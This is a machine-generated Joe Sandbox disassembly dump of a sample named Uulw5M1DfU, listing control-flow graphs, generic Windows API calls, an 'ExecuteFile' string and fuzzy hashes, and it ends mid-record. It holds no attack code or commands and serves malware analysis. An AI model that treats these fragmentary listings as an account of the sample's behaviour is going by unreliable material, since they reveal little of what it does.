                                                                                                control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1120 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1120 1121 40983c-409846 call 409425 1112->1121 1113->1114 1116 409780-409796 call 4094e0 call 40969d call 40e959 1114->1116 1117 4097a3-4097a8 1114->1117 1137 40979b-4097a1 1116->1137 1118 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1117->1118 1119 4097aa-4097b4 1117->1119 1124 4097f3-409809 1118->1124 1119->1118 1119->1124 1133 409881-40989a call 4010e2 call 40eb24 1120->1133 1134 409878-40987f call 40ebf7 1120->1134 1144 40984a-40984c 1121->1144 1129 40980c-409814 1124->1129 1136 409816-409825 call 409403 1129->1136 1129->1137 1153 40989d-4098c0 call 40eb19 1133->1153 1134->1133 1136->1129 1137->1109 1144->1110 1157 4098c2-4098c7 1153->1157 1158 4098f6-4098f9 1153->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1163 409954 1159->1163 1164 40994b-409952 call 409c13 1159->1164 1165 409902-409904 1160->1165 1166 409908-40991e call 409530 call 409425 1160->1166 1161->1162 1179 4098e9-4098eb 1162->1179 1180 4098ef-4098f1 1162->1180 1170 409956-40996d call 4010e2 1163->1170 1164->1170 1165->1166 1166->1159 1181 40997b-4099a0 call 409fb4 1170->1181 1182 40996f-409978 1170->1182 1179->1180 1180->1110 1186 4099a2-4099a7 1181->1186 1187 4099e3-4099e6 1181->1187 1182->1181 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1153 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1225 409aa2-409aa4 1213->1225 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1222 409a73-409a75 1218->1222 1223 409a79-409a91 call 409530 call 409425 1218->1223 1219->1213 1220->1195 1224 409adf-409ae5 1220->1224 1222->1223 1223->1144 1233 409a97-409a9d 1223->1233 1224->1195 1228 409aa6-409aa8 1225->1228 1229 409aac-409ab0 1225->1229 1228->1229 1229->1195 1233->1144
                                                                                                APIs
                                                                                                • _EH_prolog.MSVCRT ref: 004096D0
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                                                  • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@$H_prolog
                                                                                                • String ID: HIA
                                                                                                • API String ID: 3431946709-2712174624
                                                                                                • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                                                • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                                                • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                                                • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                                • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                                • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                                • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlenmemcmp$memmove
                                                                                                • String ID:
                                                                                                • API String ID: 3251180759-0
                                                                                                • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                                • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                                                • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                                • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                                                                                APIs
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                                                • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                                                  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 359084233-0
                                                                                                • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                                • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                                                • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                                • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                                                • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                                                • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                • String ID:
                                                                                                • API String ID: 635176117-0
                                                                                                • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                                • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                                                • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                                • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                                                                                APIs
                                                                                                • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@
                                                                                                • String ID: ExecuteFile
                                                                                                • API String ID: 1033339047-323923146
                                                                                                • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                                                • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                                                • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                                                • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                                                                                APIs
                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@??3@memmove
                                                                                                • String ID:
                                                                                                • API String ID: 3828600508-0
                                                                                                • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                                                • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                                                • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                                                • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                                                APIs
                                                                                                • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: GlobalMemoryStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 1890195054-2766056989
                                                                                                • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                                • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                                                                • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                                • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                                                                APIs
                                                                                                  • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                                                  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 4269121280-0
                                                                                                • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                                • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                                                                • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                                • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??3@H_prolog
                                                                                                • String ID:
                                                                                                • API String ID: 1329742358-0
                                                                                                • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                                • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                                                • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                                • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                                                APIs
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@??3@
                                                                                                • String ID:
                                                                                                • API String ID: 1936579350-0
                                                                                                • Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                                                • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                                                                                • Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                                                • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
